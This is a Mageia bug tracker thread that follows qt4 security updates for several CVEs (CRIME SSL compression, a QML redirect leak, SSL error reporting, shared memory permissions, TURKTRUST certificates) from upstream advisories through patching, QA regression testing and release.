OpenSuSE has issued an advisory on October 31: http://lists.opensuse.org/opensuse-updates/2012-10/msg00096.html It sounds like the same issue as this one, which Fedora issued an advisory for on October 2: http://lists.fedoraproject.org/pipermail/package-announce/2012-October/089815.html which references upstream here: http://qt.digia.com/Release-Notes/security-issue-september-2012/ from http://lwn.net/Vulnerabilities/519844/ It is unclear which versions are affected.
CC: (none) => nicolas.lecureuilWhiteboard: (none) => MGA2TOO, MGA1TOO
CC: (none) => balcaen.john
Ubuntu has issued an advisory for this on November 8: http://www.ubuntu.com/usn/usn-1628-1/
Fedora has issued an advisory on December 5: http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094633.html This fixes a new upstream security issue, fixed in 4.8.4: http://lists.qt-project.org/pipermail/announce/2012-November/000014.html
The CVE for the security issue in Comment 2 is CVE-2012-5624. LWN reference: http://lwn.net/Vulnerabilities/529993/
Summary: qt4 new security issue CVE-2012-4929 => qt4 new security issues CVE-2012-4929 and CVE-2012-5624
CC: (none) => oe
We now have qt4 4.8.4 in Cauldron, hopefully CVE-2012-4929 isn't an issue there. Mageia 1 is EOL.
Version: Cauldron => 2Whiteboard: MGA2TOO, MGA1TOO => (none)
Fix in r338296 (mga2, updates_testing, qt4-4.8.3-1.2.mga2).
Oden, you missed CVE-2012-5624.
Bumped it to qt4-4.8.4-1.mga2
Thanks Oden! Assigning to QA. Advisory: ======================== Updated qt4 packages fix security vulnerabilities: A security vulnerability has been discovered in the SSL/TLS protocol, which affects connections using compression. The protocol, as used by Qt before 4.8.4, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack (CVE-2012-4929). The XMLHttpRequest object in Qt is intended to offer similar behaviour to that in web browsers, though it intentionally does not enforce the same-orign policy. It has been determined that the implementation in Qt will allow redirection from http to file schemes which may allow an attacker performing a man-in-the-middle attack to cause QML applications to leak sensitive information (CVE-2012-5624). This update provides Qt4 4.8.4, which disables SSL/TLS compression by default to mitigate CVE-2012-4929 and makes the rules for redirects a bit stricter to mitigate CVE-2012-5624. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4929 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5624 http://qt.digia.com/Release-Notes/security-issue-september-2012/ http://lists.qt-project.org/pipermail/announce/2012-November/000014.html http://qt.digia.com/Release-Notes/Release-Notes-Qt-484/ http://lists.fedoraproject.org/pipermail/package-announce/2012-October/089815.html http://lists.opensuse.org/opensuse-updates/2012-10/msg00096.html http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094633.html ======================== Updated packages in core/updates_testing: ======================== qt4-common-4.8.4-1.mga2 libqtxml4-4.8.4-1.mga2 libqtscripttools4-4.8.4-1.mga2 libqtxmlpatterns4-4.8.4-1.mga2 libqtsql4-4.8.4-1.mga2 libqtnetwork4-4.8.4-1.mga2 libqtscript4-4.8.4-1.mga2 libqtgui4-4.8.4-1.mga2 libqtsvg4-4.8.4-1.mga2 libqttest4-4.8.4-1.mga2 libqthelp4-4.8.4-1.mga2 libqtclucene4-4.8.4-1.mga2 libqtcore4-4.8.4-1.mga2 libqt3support4-4.8.4-1.mga2 libqtopengl4-4.8.4-1.mga2 libqtdesigner4-4.8.4-1.mga2 libqtdbus4-4.8.4-1.mga2 libqtmultimedia4-4.8.4-1.mga2 qt4-qtdbus-4.8.4-1.mga2 libqtdeclarative4-4.8.4-1.mga2 qt4-qmlviewer-4.8.4-1.mga2 libqt4-devel-4.8.4-1.mga2 qt4-devel-private-4.8.4-1.mga2 qt4-xmlpatterns-4.8.4-1.mga2 qt4-qtconfig-4.8.4-1.mga2 qt4-doc-4.8.4-1.mga2 qt4-demos-4.8.4-1.mga2 qt4-examples-4.8.4-1.mga2 qt4-linguist-4.8.4-1.mga2 qt4-assistant-4.8.4-1.mga2 qt4-database-plugin-mysql-4.8.4-1.mga2 qt4-database-plugin-sqlite-4.8.4-1.mga2 qt4-database-plugin-tds-4.8.4-1.mga2 qt4-database-plugin-pgsql-4.8.4-1.mga2 qt4-graphicssystems-plugin-4.8.4-1.mga2 qt4-accessibility-plugin-4.8.4-1.mga2 qt4-designer-4.8.4-1.mga2 qt4-designer-plugin-webkit-4.8.4-1.mga2 qt4-designer-plugin-qt3support-4.8.4-1.mga2 qt4-qvfb-4.8.4-1.mga2 qt4-qdoc3-4.8.4-1.mga2 from qt4-4.8.4-1.mga2.src.rpm
Assignee: bugsquad => qa-bugs
Now there's CVE-2012-6093: http://lists.qt-project.org/pipermail/announce/2013-January/000020.html
CC: (none) => qa-bugsVersion: 2 => CauldronAssignee: qa-bugs => oeWhiteboard: (none) => MGA2TOO
Summary: qt4 new security issues CVE-2012-4929 and CVE-2012-5624 => qt4 new security issues CVE-2012-4929, CVE-2012-5624, and CVE-2012-6093
Fedora references the issue we just fixed in our rootcerts update candidate as affecting Qt. Will ours be OK when we update rootcerts, or is this something that needs to be fixed directly in Qt itself? http://lists.qt-project.org/pipermail/announce/2013-January/000021.html http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096444.html BTW Fedora also fixed CVE-2012-6093 in that update.
LWN reference for CVE-2012-6093: http://lwn.net/Vulnerabilities/532545/
(In reply to comment #10) > Fedora references the issue we just fixed in our rootcerts update candidate as > affecting Qt. Will ours be OK when we update rootcerts, or is this something > that needs to be fixed directly in Qt itself? Yes and No, kde (kdelibs4) uses the system bundle (/etc/pki/tls/certs/ca-bundle.crt) but redhat may have blacklisted the certs in qt as well (hardcoded). Hmm, yes they did after looking at those links.
I added patches in Mageia 2 and Cauldron SVN: qt-everywhere-opensource-src-4.8.4-QTBUG-28343.patch (fix CVE-2012-6093) qt-4.8-CVE-2013-0254.patch (fix a new issue [1]) qt-everywhere-opensource-src-4.8.4-QTBUG-28937.patch (blacklist turktrust) qt-everywhere-opensource-src-4.8.4-QTBUG-24654.patch (more blacklisting) [1] - http://lists.qt-project.org/pipermail/announce/2013-February/000023.html http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0254 If these look good to you, please push to the build system (unless you just want to wait for 4.8.5 which probably contains all of these fixes).
Pushed in Cauldron by Funda.
Version: Cauldron => 2Whiteboard: MGA2TOO => (none)
mgarepo submit is not working at the moment, but here's additional notes for the advisory once this is pushed in mga2. ----- Two intermediate CA certificates were mis-issued by the TURKTRUST certificate authority. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information (CVE-2013-0743). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0743 http://lists.qt-project.org/pipermail/announce/2013-January/000021.html http://www.ubuntu.com/usn/USN-1687-1/ A security flaw was found in the way QSslSocket implementation of the Qt, a software toolkit for applications development, performed certificate verification callbacks, when Qt libraries were used with different OpenSSL version than the one, they were compiled against. In such scenario, this would result in a connection error, but with the SSL error list to contain QSslError:NoError instead of proper reason of the error. This might result in a confusing error being presented to the end users, possibly encouraging them to ignore the SSL errors for the site the connection was initiated against (CVE-2012-6093). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6093 http://lists.qt-project.org/pipermail/announce/2013-January/000020.html http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096444.html The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before 4.7.6, and other versions including 4.4.0 uses weak permissions (world-readable and world-writable) for shared memory segments, which allows local users to read sensitive information or modify critical program data, as demonstrated by reading a pixmap being sent to an X server (CVE-2013-0254). http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0254 http://lists.qt-project.org/pipermail/announce/2013-February/000023.html Patches from upstream have been included to fix CVE-2013-0254 by forcing all System V shared memory segments to be created with user-only permissions, fix CVE-2012-6093 by using the correct public API in openssl, and fix CVE-2013-0743 by blacklisting the invalid certificates.
Patched package uploaded for Mageia 2. Advisory: ======================== Updated qt4 packages fix security vulnerabilities: A security vulnerability has been discovered in the SSL/TLS protocol, which affects connections using compression. The protocol, as used by Qt before 4.8.4, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which allows man-in-the-middle attackers to obtain plaintext HTTP headers by observing length differences during a series of guesses in which a string in an HTTP request potentially matches an unknown string in an HTTP header, aka a "CRIME" attack (CVE-2012-4929). The XMLHttpRequest object in Qt is intended to offer similar behaviour to that in web browsers, though it intentionally does not enforce the same-orign policy. It has been determined that the implementation in Qt will allow redirection from http to file schemes which may allow an attacker performing a man-in-the-middle attack to cause QML applications to leak sensitive information (CVE-2012-5624). A security flaw was found in the way QSslSocket implementation of the Qt, a software toolkit for applications development, performed certificate verification callbacks, when Qt libraries were used with different OpenSSL version than the one, they were compiled against. In such scenario, this would result in a connection error, but with the SSL error list to contain QSslError:NoError instead of proper reason of the error. This might result in a confusing error being presented to the end users, possibly encouraging them to ignore the SSL errors for the site the connection was initiated against (CVE-2012-6093). Two intermediate CA certificates were mis-issued by the TURKTRUST certificate authority. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information (CVE-2013-0743). The QSharedMemory class in Qt 5.0.0, 4.8.x before 4.8.5, 4.7.x before 4.7.6, and other versions including 4.4.0 uses weak permissions (world-readable and world-writable) for shared memory segments, which allows local users to read sensitive information or modify critical program data, as demonstrated by reading a pixmap being sent to an X server (CVE-2013-0254). This update provides Qt4 4.8.4, which disables SSL/TLS compression by default to mitigate CVE-2012-4929 and makes the rules for redirects a bit stricter to mitigate CVE-2012-5624. Patches from upstream have been included to fix CVE-2013-0254 by forcing all System V shared memory segments to be created with user-only permissions, fix CVE-2012-6093 by using the correct public API in openssl, and fix CVE-2013-0743 by blacklisting the invalid certificates. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4929 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5624 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0254 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0743 http://qt.digia.com/Release-Notes/security-issue-september-2012/ http://lists.qt-project.org/pipermail/announce/2012-November/000014.html http://qt.digia.com/Release-Notes/Release-Notes-Qt-484/ http://lists.qt-project.org/pipermail/announce/2013-January/000020.html http://lists.qt-project.org/pipermail/announce/2013-January/000021.html http://lists.qt-project.org/pipermail/announce/2013-February/000023.html http://lists.fedoraproject.org/pipermail/package-announce/2012-October/089815.html http://lists.opensuse.org/opensuse-updates/2012-10/msg00096.html http://lists.fedoraproject.org/pipermail/package-announce/2012-December/094633.html http://lists.fedoraproject.org/pipermail/package-announce/2013-January/096444.html http://www.ubuntu.com/usn/USN-1687-1/ ======================== Updated packages in core/updates_testing: ======================== qt4-common-4.8.4-1.1.mga2 libqtxml4-4.8.4-1.1.mga2 libqtscripttools4-4.8.4-1.1.mga2 libqtxmlpatterns4-4.8.4-1.1.mga2 libqtsql4-4.8.4-1.1.mga2 libqtnetwork4-4.8.4-1.1.mga2 libqtscript4-4.8.4-1.1.mga2 libqtgui4-4.8.4-1.1.mga2 libqtsvg4-4.8.4-1.1.mga2 libqttest4-4.8.4-1.1.mga2 libqthelp4-4.8.4-1.1.mga2 libqtclucene4-4.8.4-1.1.mga2 libqtcore4-4.8.4-1.1.mga2 libqt3support4-4.8.4-1.1.mga2 libqtopengl4-4.8.4-1.1.mga2 libqtdesigner4-4.8.4-1.1.mga2 libqtdbus4-4.8.4-1.1.mga2 libqtmultimedia4-4.8.4-1.1.mga2 qt4-qtdbus-4.8.4-1.1.mga2 libqtdeclarative4-4.8.4-1.1.mga2 qt4-qmlviewer-4.8.4-1.1.mga2 libqt4-devel-4.8.4-1.1.mga2 qt4-devel-private-4.8.4-1.1.mga2 qt4-xmlpatterns-4.8.4-1.1.mga2 qt4-qtconfig-4.8.4-1.1.mga2 qt4-doc-4.8.4-1.1.mga2 qt4-demos-4.8.4-1.1.mga2 qt4-examples-4.8.4-1.1.mga2 qt4-linguist-4.8.4-1.1.mga2 qt4-assistant-4.8.4-1.1.mga2 qt4-database-plugin-mysql-4.8.4-1.1.mga2 qt4-database-plugin-sqlite-4.8.4-1.1.mga2 qt4-database-plugin-tds-4.8.4-1.1.mga2 qt4-database-plugin-pgsql-4.8.4-1.1.mga2 qt4-graphicssystems-plugin-4.8.4-1.1.mga2 qt4-accessibility-plugin-4.8.4-1.1.mga2 qt4-designer-4.8.4-1.1.mga2 qt4-designer-plugin-webkit-4.8.4-1.1.mga2 qt4-designer-plugin-qt3support-4.8.4-1.1.mga2 qt4-qvfb-4.8.4-1.1.mga2 qt4-qdoc3-4.8.4-1.1.mga2 from qt4-4.8.4-1.1.mga2.src.rpm
CC: qa-bugs => (none)Assignee: oe => qa-bugs
Fedora has issued an advisory on February 8: http://lists.fedoraproject.org/pipermail/package-announce/2013-February/098698.html This fixes CVE-2013-0254, which is now on LWN at: http://lwn.net/Vulnerabilities/537754/
CVE-2013-0743 seems to have been withdrawn as a CVE David.
No PoC's that I can see so as with kdelibs, just checking for regressions in kde applications.
For qt4-designer also checking the webkit plugin is present, see https://bugs.mageia.org/show_bug.cgi?id=6656#c14
Claire, are you testing x86_64? If so, I can check some apps for regressions in i586? Carolyn
CC: (none) => isolde
Testing complete mga2 64 Checked qt4-designer, dragged a QtWebView to the main window. qt-linguist starts ok, amarok, gwenview, quassel, konqueror, okular and general kde use. No regressions noticed.
Whiteboard: (none) => has_procedure mga2-64-ok
Testing some apps for regressions in i586. Carolyn
No regressions noticed with Konversation, KWrite, KTimer, KCalc, Konsole, Gwenview, Okular QT Designer - created a window with a button, text label, graphicsview and LCD number, viewed generated code in KWrite. Seems OK as far as I can tell. Carolyn
Update validated. See comment 16 for advisory and SRPM. Could sysadmin please push from core/updates_testing to core/updates. Thank you. Carolyn
Keywords: (none) => validated_updateCC: (none) => sysadmin-bugsWhiteboard: has_procedure mga2-64-ok => has_procedure mga2-64-ok mga-32-ok
Update pushed: https://wiki.mageia.org/en/Support/Advisories/MGASA-2013-0053
Status: NEW => RESOLVEDCC: (none) => tmbResolution: (none) => FIXED